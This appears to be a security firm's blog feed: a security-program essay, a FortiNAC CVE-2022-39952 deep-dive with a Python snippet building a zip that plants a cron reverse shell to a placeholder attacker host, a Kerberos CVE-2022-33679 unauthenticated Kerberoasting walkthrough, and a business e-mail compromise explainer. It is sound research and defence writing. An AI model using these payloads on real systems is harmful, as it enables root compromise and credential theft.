
Journey to Secure

13 February 2023 at 22:02

This will be a series following my “journey to secure” since joining my organization. I want to preface that this is in no way a blueprint everyone can follow, but it is the logic and steps I used to understand the business, the current security state, and leadership’s vision for building an internal security program. Our job as security practitioners is to keep the needle moving forward by maturing security for an organization. The “journey to secure” never stops, and it is crucially important in the highly interconnected digital age we live in.

The culture of the company dictates how easy this journey to secure will be, or what trials and tribulations you will face. The sad truth for the “blue team” is that protecting your organization demands 100% perfection, an impossible task since no one is perfect. The flip side is that the bad guys only have to be right once. They can have millions of failures and it’s acceptable; the single attempt that gets through the blue team’s defenses is all that matters.

Understand that this is a journey. You won’t solve the world’s problems tomorrow. You need to be agile enough to respond to new threats, and you need enough vision to plan out your journey and raise the security posture of your organization.

First 90 Days

DON’T MAKE CHANGES!!! It kills me every time I see people trying to implement or change a process almost immediately out of the gate when they join a company. In my experience, in your first 90 days at a new company you haven’t even been fully onboarded yet. You don’t fully understand the company and what makes it tick. You don’t know how your change will affect the day-to-day work of users. In reality, I’ve seen the average time before people feel comfortable and know who to ask for answers is about six months. You have to understand the current state and the environment. You need to LISTEN to your subordinates, peers, and leaders. You have to ABSORB this data and information so you can make tactical changes that actually improve a process or seal a gap.

Am I saying don’t do anything at all during this time? No. You can plan and start laying out your roadmap and vision as you learn what’s currently in place as well as what’s missing. You need to identify gaps, as well as enhancements you can bring to the company, to move the needle forward for security. And you need to make sure you’re practicing meaningful security, not the security theater so many people are blinded by.

In my first 90 days, I listened to everyone I could have conversations with. I started to develop my “network” within the company so people would know who I am and what my visions and goals are. This allowed me to listen, absorb, and identify the systemic issues the organization was facing, as well as the things already being done really well. It gave me credibility with the team: they knew I was there to help them, not to be a burden. At the end of the day we are one team. We all work at the same company and want it to thrive and be successful. Ingraining myself into the team built personal relationships, so people understood who I am as a person and that, deep down, I intend to do the right thing even if it’s not the popular thing.

I realized this is a startup, a highly specialized cybersecurity startup, so there are some very intelligent individuals within this organization who have been implementing security controls since its inception. I had 5,000,000 questions going through my head, and I still do. What’s our attack surface? What are our biggest risks? What controls do we have in place? Are the policies and standards accurate? Are we doing what we state in our policies? I could go on and on with the questions I was asking teams in order to gather data and notes. I asked questions, took notes, and devised a plan, while staying agile enough to swap what I thought was a priority for something else based on feedback or trends that needed to be addressed. Always ask questions. The moment you stop asking questions is the moment you stop learning.

First 90 Days Done, What Now?

From the first 90 days I saw a recurring trend coming from VRAs (Vendor Risk Assessments) from prospective clients, emails between teammates, and chat messages. We had variations of phishing and smishing attempts happening within the org. We had our annual cybersecurity awareness training that met the checkbox for all regulatory requirements. Does meeting the checkbox for compliance mean that what you have in place is effective? No, it does not. We had a baseline that allowed us to meet regulatory compliance, but not everyone was on the same page about what to do when they got phishing, smishing, or vishing attempts. The company didn’t have a repeatable process for users to follow in that situation. They didn’t know what to do. So I set out with a focus on the below (in no specific order):

Journey to Secure: Security Goals

The security awareness training and the process for handling phishing attempts needed to be improved. Based on the population size of the company this wouldn’t be a huge overhaul, and though it would be challenging, it would allow me to solve a systemic problem. The technical side wouldn’t be the challenge here, as there are plenty of solutions that provide simulated phishing and Security Awareness Training (SAT). The challenge with this program is the human aspect of it. We needed to change human behavior. We needed to coach people on what to do and how to do it. So how do you achieve that change?

The first thing you need is leadership buy-in. Leadership buy-in allows them to go to bat for you and support the program when you get pushback. Anyone who has ever implemented any security solution knows there will always be pushback, so you need that buy-in to have a leg to stand on when it happens.

For me it ended up being the perfect storm, as I got lucky on the timing of everything. I paired the launch of our phishing and SAT platform with Cybersecurity Awareness Month. This let me pair the launch with frequent communication to the organization so people developed instant familiarity with the platform. In preparation for the launch I created a SAT policy that used a “rewards”-based system. Those rewards were for successes as well as failures. How do you reward a failure? You reward it with training and education. Educating someone so we can be better as individuals is a great reward. For full transparency, there are some negative consequences for failures as well, but in developing the phishing and SAT program I made sure users were given every opportunity before those come into play.

I wanted basic, repeatable metrics that clearly told the story I was trying to tell; at the end of the day, metrics are just the stories you’re telling. I decided to use the below as my quarterly reporting areas to show where we needed to educate the company.

  • Phishing
    • Failure criteria metrics per phishing campaign, such as:
      • Clicked links
      • Data entered
      • Replied to
    • Success, which in my mind is the most important metric of all:
      • Reported
  • Training
    • Completion percentage for each training campaign
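The quarterly reporting above can be sketched as a tiny calculation. This is a hypothetical example: the field names and sample counts are assumptions, not any platform’s actual export format.

```python
# Hypothetical sketch of the quarterly phishing metrics described above.
# The field names and the sample numbers are illustrative assumptions.

def campaign_metrics(recipients, clicked, data_entered, replied, reported):
    """Return failure and success rates (%) for a single phishing campaign."""
    failures = clicked + data_entered + replied
    return {
        "failure_rate": round(failures / recipients * 100, 1),
        "report_rate": round(reported / recipients * 100, 1),  # the key success metric
    }

print(campaign_metrics(recipients=200, clicked=12, data_entered=3, replied=1, reported=90))
# → {'failure_rate': 8.0, 'report_rate': 45.0}
```

Reporting is tracked separately from the failure criteria because a user can both fail (click) and succeed (report) in the same campaign.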

Outcome so far

Since the overhaul of the program, this is what we are currently seeing:

  • Increased conversations around phishing and security awareness training in our internal chat platform: good, bad, sarcastic, and indifferent alike.
  • A continual increase in users reporting phishing or suspicious emails via the phishing button that was implemented.
  • A large adoption rate for the security awareness training content and material.

Is what I implemented perfect? No, even though I would love to think it is. Does it give us a foundation to improve from? Yes! Does it provide value? YES! Education is one of the strongest things you can give users. And it isn’t only for the users; it’s education for myself and the team on creating effective playbooks for handling situations and improving. Playbooks let the most seasoned professional, or the person fresh into the workforce getting their foot into cybersecurity, respond to a situation the same way every time. We have built a SAT program that gives monthly training modules to everyone. I now have the platform to iterate on the feedback I’m getting from the user population to make things better: driving our users to not blindly click links, to report something suspicious rather than assume someone else has, and to raise our collective security awareness, because we cybersecurity professionals aren’t excluded from the lessons we preach. As I stated at the beginning, no one is perfect, but we can always strive to be better. That’s what I’m trying to achieve here: make myself a better security practitioner and leader, but also make the company better through our security practices, with a smiling face that’s here to help anyone and everyone I can.

Until the next time.

Stay vigilant.

The post Journey to Secure appeared first on

Fortinet FortiNAC CVE-2022-39952 Deep-Dive and IOCs

21 February 2023 at 12:40


On Thursday, 16 February 2023, Fortinet released a PSIRT advisory detailing CVE-2022-39952, a critical vulnerability affecting its FortiNAC product. This vulnerability, discovered by Gwendal Guégniaud of Fortinet, allows an unauthenticated attacker to write arbitrary files on the system and, as a result, obtain remote code execution in the context of the root user.

Extracting the System

Extracting the filesystems from the appliances is straightforward. First, the mountable filesystem paths are listed from the vmdk:

sudo virt-filesystems --filesystems -a fortinac-

Next, we mount the filesystem to a directory we create:

sudo guestmount -a fortinac- -m /dev/centos/root --ro /tmp/fnac941

The Vulnerability

After extracting the filesystems from both the vulnerable and patched vmdks, it’s apparent that the file /bsc/campusMgr/ui/ROOT/configWizard/keyUpload.jsp was removed in the patch; it also matches the name of the servlet mentioned in the advisory.

Examining the contents of keyUpload.jsp, we see that the unauthenticated endpoint will parse requests that supply a file in the key parameter and, if found, write it to /bsc/campusMgr/config.applianceKey.

After successfully writing the file, a call to Runtime().Exec() executes a bash script located at /bsc/campusMgr/bin/configApplianceXml.

The bash script calls unzip on the file that was just written. Seeing this call on an attacker-controlled file immediately gave us flashbacks to a few recent vulnerabilities we’ve looked at that abused archive unpacking. While our initial thoughts were of a directory traversal issue, unzip helpfully strips relative paths and protects against traversals.

The issue is actually much simpler, and no traversal is needed. Just before the call to unzip, the bash script calls cd /. Unzip will place files in any path as long as it does not traverse above the current working directory. Because the working directory is /, the call to unzip inside the bash script allows any arbitrary file to be written.

Weaponization of the Issue

Similar to the weaponization of previous archive vulnerability issues that allow arbitrary file write, we use this vulnerability to write a cron job to /etc/cron.d/payload. This cron job gets triggered every minute and initiates a reverse shell to the attacker.

We first create a zip that contains a file and specify the path we want it extracted to. Then, we send the malicious zip file to the vulnerable endpoint in the key field. Within a minute, we get a reverse shell as the root user. Our proof-of-concept exploit automating this can be found on our GitHub.
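A minimal sketch of the archive-construction step, assuming the behavior described above (cd / before unzip): a zip entry with the relative path etc/cron.d/payload lands at /etc/cron.d/payload. The cron line and ATTACKER_IP/PORT are placeholders, and this builds the archive only; delivering it in the key field is not shown.

```python
import io
import zipfile

# Because the bash script runs `cd /` before calling unzip, a *relative*
# zip entry path like etc/cron.d/payload is written to /etc/cron.d/payload.
# ATTACKER_IP and PORT below are placeholders.
cron_line = "* * * * * root bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1\n"

buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("etc/cron.d/payload", cron_line)  # relative path, no traversal needed

payload_zip = buf.getvalue()  # bytes to send in the `key` field of the request
```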

Indicators of Compromise

Unfortunately, the FortiNAC appliance does not allow access to the GUI unless a license key has been added, so no native GUI logs were available to check for indicators. However, exploitation of the issue was observable in filesystem logs located at /bsc/logs/output.master. Specifically, you could check for the line Running configApplianceXml as long as the attacker has not cleared out this log file.
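A quick sketch of checking an offline copy of that log for the indicator; the path and the indicator string come from the paragraph above, while the sample log lines are made up.

```python
# Scan an offline copy of /bsc/logs/output.master for the exploitation
# indicator mentioned above. The sample log lines here are illustrative.
INDICATOR = "Running configApplianceXml"

def find_indicator(log_text):
    """Return 1-based line numbers that contain the indicator string."""
    return [i for i, line in enumerate(log_text.splitlines(), 1) if INDICATOR in line]

sample = "service started\nRunning configApplianceXml\nunzip complete\n"
print(find_indicator(sample))  # → [2]
```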

Arbitrary file write vulnerabilities can be abused in several ways to obtain remote code execution. In this case, we write a cron job to /etc/cron.d/, but attackers could also overwrite a binary on the system that is regularly executed, or write SSH keys to a user’s profile.


From CVE-2022-33679 to Unauthenticated Kerberoasting

25 February 2023 at 22:29

On September 13, 2022, a new Kerberos vulnerability was published on the Microsoft Security Response Center’s security site.  It’s labeled as a Windows Kerberos Elevation of Privilege vulnerability and given the CVE ID CVE-2022-33679.  The MSRC page acknowledges James Forshaw of Google Project Zero for the disclosure and James published a detailed technical write-up of the vulnerability on Project Zero’s blog.  The attack targets Windows domain accounts that have pre-authentication disabled and it attempts an encryption downgrade attack.  A proof-of-concept (PoC) script was released by Bdenneu on Github that performs the attack and when successful, obtains a ticket-granting-service service ticket. In this post, we’re going to cover some high level Kerberos details, show how to exploit the vulnerability with the PoC and reveal how to extend this attack all the way to unauthenticated Kerberoasting.

In order to understand the vulnerability and what we’re doing later in this post, it’s useful to know what Kerberos is and how it works.  It is also important to understand how existing attacks like Kerberoasting and AS-REP Roasting work.  If you’re already familiar with Kerberos and common attacks, feel free to skip this section.

What is Kerberos?

Kerberos is an authentication protocol that is used to verify the identity of a user or host.  The Windows Server operating systems implement Kerberos version 5 for public key authentication, transporting authorization data and delegation.  It is commonly used in Windows Active Directory domains and provides the following benefits:

  • Delegated authentication
  • Single sign on
  • Interoperability
  • More efficient authentication to servers
  • Mutual authentication

I’m going to focus on the Windows implementation of Kerberos 5 and how it’s used in an Active Directory domain.  The following describes some of the key components and services:

Key Distribution Center (KDC) – This is a service that usually runs on the Domain Controller and it interacts with other Windows Server security services.  The KDC provides two services: an authentication service and a ticket granting service.

The Kerberos authentication service is used by network clients to authenticate themselves to the domain and/or domain services.  Once a client has authenticated, the authentication service sends the client a Ticket-Granting-Ticket (TGT) to be used with the Ticket-Granting-Service.

The Ticket-Granting-Service (TGS) accepts and validates TGTs from clients and issues TGS service tickets to the clients.  TGS service tickets are provided to domain services by the clients to prove they are valid domain clients.

How does it work?

Kerberos authentication is based on the use of pre-shared keys.  The KDC has access to any client’s private key via the domain controller’s security services (in most cases the KDC runs on the domain controller).  The authentication process starts when a network client makes an authentication request (AS-REQ) to the KDC.  If pre-authentication is enabled, the KDC will send an authentication reply (AS-REP) with a failure message asking the client to send an encrypted timestamp as part of the next AS-REQ.  The timestamp is encrypted with the client’s password hash and sent to the KDC in an AS-REQ message.  Since the KDC has the client’s password hash from the domain controller, it can decrypt the timestamp and verify that the timestamp is within a given time frame.  This is how the KDC verifies that the client is who it says it is.  The KDC responds to the client with an AS-REP that has an encrypted TGT and an encrypted client blob.  The client blob is encrypted with the client’s password hash so only the client can decrypt it.  This is how the client knows the TGT came from the KDC.  The encrypted client blob has details about the encrypted TGT as well as a session key that will be used in the next phase of authentication.  The encrypted TGT is encrypted with the KDC’s secret (password hash), so the client cannot decrypt it.  If pre-authentication is disabled, the KDC will respond without question to the initial AS-REQ and provide the encrypted TGT and session key.

Attacker’s note:  Having pre-authentication disabled is a dangerous misconfiguration.  Attackers can simply query the KDC for users with pre-authentication disabled and then request TGTs for each user.  The AS-REP’s encrypted client blob, encrypted with the user’s password hash, can then be taken offline for a brute-force password-cracking attack.  If the password is cracked, the attacker has valid credentials for a domain user.  This kind of Kerberos attack is known as AS-REP Roasting and is trivial to perform.  Pre-authentication should rarely be disabled, and only in cases where it’s necessary for compatibility with legacy systems.  Any accounts that have it disabled should have passwords sufficiently long and complex to thwart password-cracking attempts.
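As an illustration of that “simply query” step, accounts with pre-authentication disabled are commonly found with an LDAP query on the DONT_REQ_PREAUTH bit (0x400000) of userAccountControl, using the bitwise-AND matching rule OID. A minimal sketch that only builds the filter string (actually issuing the query against a DC is out of scope here):

```python
# Build the LDAP filter used to enumerate accounts with Kerberos
# pre-authentication disabled. 1.2.840.113556.1.4.803 is the bitwise-AND
# matching rule OID; 0x400000 is the DONT_REQ_PREAUTH flag.
UF_DONT_REQUIRE_PREAUTH = 0x400000  # 4194304

ldap_filter = (
    "(&(objectClass=user)"
    f"(userAccountControl:1.2.840.113556.1.4.803:={UF_DONT_REQUIRE_PREAUTH}))"
)
print(ldap_filter)
```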

The client next decrypts the client blob to get a session key and makes a TGS request (TGS-REQ) to the TGS.  The TGS-REQ includes the Service Principal Name (SPN) of the service it wants to access and preauth-data, which includes the encrypted TGT.  The TGS extracts the encrypted TGT and decrypts it.  Remember the TGS is just a service provided by the KDC and since the TGT is encrypted with the KDC’s secret, the TGS can decrypt it.  This is also how the TGS determines that the TGT is legitimate since only the KDC knows the secret.  Inside the TGT is a session key.  This session key is the same key that the client received in the AS-REP from the KDC.  The TGS prepares a TGS reply (TGS-REP) which includes a new service ticket (ST) which is encrypted with the SPN’s secret (password hash).  The TGS-REP is encrypted with the session key and sent back to the client.

The client decrypts the TGS-REP to get the encrypted ST and sends it to the desired service.  The service decrypts the ST with its secret and verifies the contents with the KDC.  Once verified, the service grants access to the requesting client and authentication is complete.

Attacker’s note:  If an attacker has valid domain credentials (user/password), they can attack the second phase of the Kerberos authentication process.  The attacker can use the credentials to request a valid TGT and then request STs for any domain services with an SPN tied to a user account.  Since each ST is encrypted with the service’s password hash, it can be dumped from memory and taken offline for a brute-force password-cracking attack.  Any cracked passwords give the attacker new credentials that enable lateral movement and possible privilege escalation, since many services run with elevated privileges.  This attack is known as TGS-REP Roasting or, more commonly, Kerberoasting.


Now that we have a baseline, let’s dive into CVE-2022-33679.  CVE-2022-33679 is similar to AS-REP Roasting in that it works against accounts with pre-authentication disabled, and the attack is unauthenticated, meaning we don’t need (nor do we have) a client’s password.  One detail of the initial client request (AS-REQ) for a TGT that I left out above is how the encryption algorithm is chosen.  In the AS-REQ, the client lists the encryption schemes it wants to use.  The KDC selects one and uses it, with the client’s secret, to encrypt the session key in the AS-REP back to the client.  There are several schemes to choose from, including a few that shouldn’t be used because they are considered weak.  CVE-2022-33679 performs an encryption downgrade attack by forcing the KDC to use the RC4-MD4 algorithm and then brute forcing the session key from the AS-REP using a known-plaintext attack.  The Project Zero blog post goes into great detail on the weaknesses of RC4-MD4 and how the brute force works, so I won’t repeat it here.  Once the session key has been extracted, you end up with a session key and a TGT: the two things you need to make a TGS-REQ to the TGS for a ST.  Pretty awesome, right?
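To see why brute forcing the session key one byte at a time is so cheap, here is a deliberately toy stand-in (emphatically not the real RC4-MD4 attack): with a stream cipher and a known plaintext, each of the 5 key bytes can be checked independently, so at most 5 * 256 guesses instead of 256^5.

```python
# Toy illustration ONLY: a fake "stream cipher" that repeats the key as its
# keystream, standing in for the weak RC4-MD4 construction. The point is the
# attack shape (byte-at-a-time recovery with known plaintext), not the cipher.

def keystream(key, n):
    return bytes(key[i % len(key)] for i in range(n))

def encrypt(key, plaintext):
    return bytes(k ^ p for k, p in zip(keystream(key, len(plaintext)), plaintext))

secret_key = bytes([0x13, 0x37, 0xCA, 0xFE, 0x42])  # 5-byte session key
known_pt = b"KNOWN"                                  # attacker-known plaintext
ct = encrypt(secret_key, known_pt)

recovered = bytearray()
for i in range(len(secret_key)):        # each key byte is recovered independently
    for guess in range(256):
        if guess ^ known_pt[i] == ct[i]:
            recovered.append(guess)
            break

assert bytes(recovered) == secret_key   # at most 5 * 256 guesses, not 256**5
```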


The PoC posted to Github performs the attack and obtains a ST for a given service.  It writes the ST out to a file in a credential cache (ccache) format.  This format, if you’re not familiar with it (which I wasn’t), is a Kerberos standard format for representing TGTs and STs and is detailed in the Kerberos documentation.  An interesting tidbit of information is that the Python Impacket library has several tools for interacting with Windows that accept credentials in ccache form.  Let’s take a look at the PoC in action and then use the credentials cache with crackmapexec to access a given server’s shared folders.

The required options for the PoC script are a target and a server name.  The target is a combination of the domain and a user account that has pre-authentication disabled.  The server name is the server you want to authenticate to.  In the example below, the domain is pod13.h3airange.internal, the user is jsmith2, and the server is the domain controller dc01.pod13.h3airange.internal.  As the screenshot shows, the PoC sends an AS-REQ and receives the AS-REP.  Then it brute forces the session key one byte at a time until it has all 5 bytes.  It uses the session key and the TGT to request a ST from the TGS and then writes it out to disk.  As a point of clarification, the script says that it receives a TGS and writes that to disk; what it means is that it receives a TGS service ticket, which I’ve been calling a ST.  That caused a bit of confusion for me initially, which I’ll discuss below.  In order to use the credentials cache with crackmapexec, we’ll need to export an environment variable called KRB5CCNAME and set it to the ccache file created by the PoC.  We’ll need to provide crackmapexec with the -k flag, which tells it to use the ccache file from the KRB5CCNAME environment variable.

Exploiting CVE-2022-33679 and using ccache to map shares

The Journey to Unauthenticated Kerberoasting

When I was tasked with adding CVE-2022-33679 to NodeZero, I knew very little about Kerberos.  I knew it was used for authentication in Windows domains, and I knew of Kerberoasting and Golden Tickets, but nothing about how any of it worked.  At Horizon3, we pride ourselves on being “learn-it-alls”: we don’t know everything, but we’re willing and able to adapt and learn on the fly as needed.  I spent a few days reading up on Kerberos, everything from blog posts to the Kerberos standards documentation.  I dove into existing attacks like AS-REP Roasting, Kerberoasting, Golden Ticket, Silver Ticket, and Pass the Ticket.  Once I felt I had a decent understanding of Kerberos and its existing weaknesses, I started to dig into the source code for the PoC and for Impacket’s tools.  One thing I found consistently throughout the process was that the terminology used for the different Kerberos stages and tickets wasn’t consistent from one place to the next.  This is why I clarified above about the type of ticket the PoC wrote to disk.

As I was developing a module to work with the PoC, something kept bothering me.  Not in a bad way, but there was a persistent feeling that there was more to this than just getting a service ticket.  I had a bunch of puzzle pieces from several different Kerberos attacks, and it felt like they hadn’t been combined to completeness yet.  Initially, I chalked it up to having spent the previous days deep-diving on Kerberos vulnerabilities and trying to keep them straight in my head, but the more I worked on the module, the more it kept nagging.  Here’s the gist of what kept bouncing through my head:

  • This CVE is unauthenticated just like AS-REP Roasting.  A valid user account is not required.
  • After the exploit we have a TGT and a session key both of which are required for interacting with the TGS.
  • The TGT and session key are legitimate, just as if they were acquired with valid credentials.
  • Kerberoasting requires valid credentials for a domain user account to request STs for SPNs with user accounts.

The question was, could these pieces be combined to do unauthenticated Kerberoasting? The short answer is yes…

Initially I thought maybe I could write the TGT to disk as a ccache file and use it later.  This was early on, when I still had a hard time keeping the different tickets and session keys straight.  In this case I was confusing the session key recovered by the PoC with the client’s secret used to encrypt the AS-REP.  I thought the recovered session key WAS the client’s password hash, not the session key used for communicating with the TGS.  I lost more time than I care to admit trying to write the TGT to a ccache file.  Impacket had everything that would be needed: it has a GETTGT class with a saveTicket() function that takes a TGT and a session key (an example of where the terminology is confusing).  saveTicket() creates a credential cache from the TGT and then saves it to a file.  Trying the TGT and a session key I had just didn’t work.  I went back and re-read the Project Zero blog and started to look at what the PoC was doing.  At some point I realized that the session key saveTicket() wants is actually the client’s password hash, which, to be fair, is initially used as the session key between the client and the KDC, but is rarely called a session key.  Regardless, the TGT could not be written to a ccache file without the client’s password.

saveTicket function from

Even though saving the TGT to a ccache file wasn’t possible, I still felt like there was more that could be done.  I did have a valid TGT and session key, after all.  The next thing needed was a list of the Service Principal Names running under user accounts in the domain.  That shouldn’t be too hard, as it is exactly what Impacket does.  Normally when Kerberoasting, we can use the -request flag and valid credentials to get a list of SPNs and their hashes.  We don’t have the valid username and password or the NTLM hash required, but we do have a ccache file from our service ticket.  It turns out a ccache file can be used as credentials when passed via an environment variable: just use the -k and -no-pass flags and set the KRB5CCNAME environment variable to the ccache file name.  Let’s give it a try.

with credential cache

As you can see, it works… sort of.  Bummer.  I thought I had connected all the dots, but as the screenshot shows, only the SPNs get printed out; the hashes don’t.  It was at this point that I almost gave up.  Actually, I did give up, for a while.  I quit for the day, defeated, but with the intent of trying again the next day with fresh eyes.  However, getting so close and failing bugged me.  It bugged me a lot.  My brain cycled in an infinite loop: “Ok, you got the service names, now what?  What can you do with that?  You have a TGT and a session key and a ST and SPNs.  What can you do with those?”  Eventually the pieces came together and I thought of something I hadn’t tried.  Since I had a TGT and a session key, which are used to request access to a service, and I now had a list of services (SPNs) with user accounts, I should be able to create new TGS-REQs, one for each service, and send the requests to the TGS.  Each TGS-REP returned would include a ST encrypted with the service’s secret (password hash), and I could dump those to crack offline.

With that idea, I made the following modifications to the original PoC.

  • Added support for a list of multiple users
  • Verified that each user has pre-authentication disabled
  • Used the ST ccache file to enumerate SPNs
  • Used the TGT, session key, and SPNs to Kerberoast the SPNs
  • Wrote the decoded STs to a file (along with additional data for each user)
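The Kerberoasting step above ends with one crackable line per SPN. As a sketch of the $krb5tgs (etype 23) line layout the cracking tools expect: the user and domain below come from the example in this post, while the SPN is hypothetical and the checksum/cipher hex are placeholders for the bytes the real script pulls from each TGS-REP.

```python
# Assemble a $krb5tgs$23$ hash line for one roasted SPN. The checksum and
# cipher hex below are placeholders; in the real script they come from the
# encrypted part of the TGS-REP for that SPN. The SPN itself is hypothetical.

def krb5tgs_line(user, domain, spn, checksum_hex, cipher_hex):
    return f"$krb5tgs$23$*{user}${domain}${spn}*${checksum_hex}${cipher_hex}"

line = krb5tgs_line("jsmith2", "POD13.H3AIRANGE.INTERNAL", "http/web01",
                    "aa" * 16, "bb" * 32)
print(line.split("$")[1])  # → krb5tgs
```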

Now when the script runs, it enumerates SPNs and dumps the krb5tgs hashes for an offline password cracking attack.  Here’s the output from a complete run of the final script.

Updated PoC to exploit CVE-2022-33679 and Kerberoast SPNs

Output of updated PoC

The Kerberoasted SPNs are in the section labeled KRBTGS in the screenshot.  There are two in this example and each begins with $krb5tgs.  If we copy them out as is and put them into a separate file, we can attempt to crack them with JohnTheRipper.
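That copy-out step can be scripted; a small helper like this (with made-up sample output) pulls only the $krb5tgs lines so they can be written to a file for cracking.

```python
# Filter a script's output down to just the crackable $krb5tgs lines,
# ready to be written to a file and fed to JohnTheRipper.
# The sample output below is made up for illustration.

def extract_krb5tgs(output):
    return [ln.strip() for ln in output.splitlines() if ln.strip().startswith("$krb5tgs")]

sample = (
    "KRBTGS:\n"
    "$krb5tgs$23$*svc1$DOM$spn1*$aa$bb\n"
    "other output\n"
    "$krb5tgs$23$*svc2$DOM$spn2*$cc$dd\n"
)
print(len(extract_krb5tgs(sample)))  # → 2
```

With the lines saved to a file such as hashes.txt, something like john --format=krb5tgs hashes.txt attempts the offline crack.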

Cracking SPN password hashes with JohnTheRipper

You might be wondering why we don’t just access the services with the ST that is returned.  The answer lies in the fact that the KDC isn’t responsible for determining whether a client is authorized to access a service.  It only authenticates the client, proving it is a valid client, and provides that validation to the service.  It’s up to the service to determine if the user is authorized to access it and to what extent.  The user in our example is jsmith2, and while it is a valid domain account, it does not have permission to access either of the services we Kerberoast.


As bad as this could be, it’s fairly straightforward to mitigate.  The two things that make this attack possible are pre-authentication being disabled and the RC4-MD4 encryption scheme.  First, pre-authentication is enabled by default in Windows domains but is sometimes disabled for legacy systems or compatibility reasons.  It should only be disabled for individual accounts, and regular audits of domain accounts will identify any that have pre-authentication disabled; make sure it is actually required.  Second, Microsoft has added a flag that disables the RC4-MD4 algorithm, and while it’s recommended that RC4 be disabled, doing so can present its own set of problems.  A final option is enforcing Kerberos Armoring (FAST) on all clients and KDCs in the environment.  Whatever mitigations you put in place, make sure you trust but verify them.


Proactive Risk Partners with to Bring Clients a Comprehensive Risk Management Solution

7 February 2023 at 00:46

Businesswire 02/07/2023

Proactive Risk, a leading provider of technology risk management solutions, is excited to announce that it has joined the Partner Program as an Authorized Service Provider.

Read the entire article here


Silicon Valley Bank (SVB) Failure Could Signal a Rise in Business E-mail Compromise (BEC)

15 March 2023 at 16:08

On 10 March, Silicon Valley Bank (SVB), a popular institution for the venture capital community in the Bay Area, failed when venture capitalists (VCs) quickly started to pull money out of the 40-year-old bank, causing federal regulators to step in and shut its doors before more damage could be done. As investors and CEOs scramble to make sense of the situation, many are looking for alternative places to store and manage their personal and company money ASAP. We understand that in this pressure-filled moment, many will likely take shortcuts and quickly share sensitive information on unsecured platforms, leaving malicious threat actors to take advantage through techniques like business e-mail compromise (BEC).

Currently, vendors are rushing to set up new accounts to switch payments to, and scrambling to update ALL payment details for their customers so that new receivables are sent to the new bank account rather than their now-defunct SVB account. These account details are being sent insecurely over e-mail and as attached PDFs, and the recipients are operating with urgency to get money transferred ASAP. Because of this emergency, customers are transferring substantial amounts of money into these new accounts, leaving both company and customer vulnerable to malicious activity during the process. These are the perfect conditions for threat actors to steal several million dollars (and perhaps much more).

What is Business E-mail Compromise (BEC)?

Threat actors commonly leverage e-mail access to conduct business accounting fraud, run highly targeted phishing attacks, gain access to sensitive information, and elicit trusting coworkers to perform actions on their behalf. According to the US Federal Bureau of Investigation (FBI), BEC is a scam targeting both businesses and individuals who perform transfers of funds. It is commonly carried out when a threat actor compromises legitimate business e-mail accounts through social engineering or computer-intrusion tactics, techniques, and procedures (TTPs) to conduct unauthorized transfers of funds. In 2021 alone, BEC scams resulted in nearly 20,000 complaints and $2.4 billion in losses. For example, threat actors have targeted the mortgage industry, specifically the home buying and refinancing workflows, whose employees use e-mail for nearly all transactions and are usually overworked and undertrained in cybersecurity issues such as BEC.

Types of Business E-mail Compromise Scams

  1. Data Theft – threat actors target the HR department and steal company information.
  2. CEO Fraud – threat actors spoof or hack into a CEO’s e-mail account, then e-mail employees instructions to make a purchase or send money.
  3. Account Compromise – threat actors use phishing or malware to get access to a finance employee’s e-mail account. Then the scammer e-mails the company’s suppliers fake invoices that request payment to a fraudulent account.
  4. False Invoice Scheme – threat actors may pose as a legitimate vendor and will send a fake invoice to be paid.
  5. Lawyer Impersonation – threat actors gain unauthorized access to an e-mail account at a law firm. Then they e-mail clients an invoice or link to pay online.

In addition to social engineering TTPs, threat actors can also use legitimate credentials to access business e-mail within an organization to impersonate targets and garner sensitive information over unsecure/unencrypted e-mail correspondence.

We know that threat actors exploit credential requirements in many ways; they can:

  • Take advantage of weak password strength requirements or weak account lockout thresholds
  • Capture and then crack hashes
  • Take advantage of accounts that reuse compromised credentials
  • Use the default credentials that remain unchanged in a variety of web applications and systems processes

Threat actors do not often use sophisticated hacking tools and techniques to gain access to business e-mail and networks; along with social engineering techniques, threat actors don’t “hack” in, they log in with legitimate user credentials.

How does BEC work?

BEC allows threat actors to read, send, and receive e-mails under the guise of that user, or many users at once. Threat actors frequently research their targets through open sources like a company website or professional social media platforms such as LinkedIn to figure out whose identity they can use in the scam. Once the threat actor gains initial access, they determine their target based on who is able to send and/or receive money (threat actors generally seek out a junior employee who is responsible for inputting the numbers into a bank’s portal). In a subsequent e-mail conversation, the threat actor will impersonate one of the parties by spoofing the e-mail domain and then try to win their target’s trust and ask them to send money, gift cards, or information. These e-mails usually contain an attached PDF with wire instructions and are often followed by a message that says, “Sorry, use these account and routing numbers instead.”
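
One defensive corollary of the domain-spoofing step described above is screening sender or reply domains for look-alikes of trusted vendors. A minimal sketch, where the trusted-domain list and the 0.8 similarity threshold are illustrative assumptions, not part of any product:

```python
import difflib

# Hypothetical trusted-vendor list; in practice this comes from your vendor records.
TRUSTED_DOMAINS = {"vendor.com", "bank.com"}

def is_lookalike(domain: str, threshold: float = 0.8) -> bool:
    """Flag domains that closely resemble, but do not exactly match, a trusted domain."""
    d = domain.lower()
    if d in TRUSTED_DOMAINS:
        return False  # exact match to a known-good domain
    return any(
        difflib.SequenceMatcher(None, d, trusted).ratio() >= threshold
        for trusted in TRUSTED_DOMAINS
    )
```

A check like this would flag “vend0r.com” as suspicious while passing the legitimate “vendor.com” through.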

Targets of BEC

  1. Executives and leaders – details of these individuals are generally available on the company website.
  2. Finance employees – these individuals have banking details, payment methods and account numbers readily available and are prime targets.
  3. HR managers – these individuals typically retain sensitive employee data like social security numbers, tax statements, and contact information.
  4. New or entry-level employees – typically these individuals will not be able to verify an e-mail’s legitimacy with the sender.

Why does this matter?

For all intents and purposes, a threat actor using credentials looks like a legitimate user. Coupled with the absence of malware, this type of attack is extremely difficult to detect.

Over the past 6 months, only 2.5% of customers experienced BEC in their environment with proof of exploitation. However, NodeZero successfully executed credential-based attacks over 6,000 times (out of the 34,000 times in which NodeZero successfully executed an attack compromising at least one host), and to significant effect. For more detail and recommendations regarding credential-based attacks, please see our Year in Review 2022 report.

For example, NodeZero was also able to execute a BEC on a large US based security systems provider by successfully chaining the following weaknesses together (See NodeZero’s attack path below):

  • Credential Dumping of Security Account Manager (SAM) Database and Local Security Authority (LSA) Secrets
  • Azure Multi-Factor Authentication Disabled
  • Credential Reuse and cracked Weak or Default Credentials

